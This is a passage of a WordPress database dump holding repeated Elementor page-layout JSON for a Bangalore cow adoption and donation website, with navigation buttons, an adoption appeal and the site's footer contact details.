":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"72051db\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26e5a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"c20d2f2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9230eae\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"f509e14\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f468db2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"2250764\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87f91ce\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"9860375\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c30f35b\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"c6d2d93\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c0c7458\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2eb3085\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41d39d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ec00ae\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"58263a0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1fe19cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a8042dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"41de25e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e80cac0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ab4d180\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e6c805\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"06b93d5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e4cd210\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"351619a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11904,1973,'_elementor_page_assets','a:0:{}'),(11906,1974,'_elementor_edit_mode','builder'),(11907,1974,'_elementor_template_type','wp-page'),(11908,1974,'_elementor_version','3.7.8'),(11909,1974,'_wp_page_template','elementor_canvas'),(11910,1974,'_elementor_data','[{\"id\":\"442ae7f\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"27b1818\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"b4f0fda\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"69a6cbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"79e4ef4\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2424986\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8aaabba\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"72051db\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26e5a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"c20d2f2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9230eae\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"f509e14\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f468db2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"2250764\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87f91ce\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"9860375\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c30f35b\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"c6d2d93\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c0c7458\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2eb3085\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41d39d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ec00ae\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"58263a0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1fe19cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a8042dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"41de25e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e80cac0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ab4d180\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e6c805\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"06b93d5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e4cd210\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"351619a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11911,1974,'_elementor_page_assets','a:0:{}'),(11913,1975,'_elementor_edit_mode','builder'),(11914,1975,'_elementor_template_type','wp-page'),(11915,1975,'_elementor_version','3.7.8'),(11916,1975,'_wp_page_template','elementor_canvas'),(11917,1975,'_elementor_data','[{\"id\":\"442ae7f\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"27b1818\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"b4f0fda\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"69a6cbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"79e4ef4\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2424986\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8aaabba\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"72051db\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\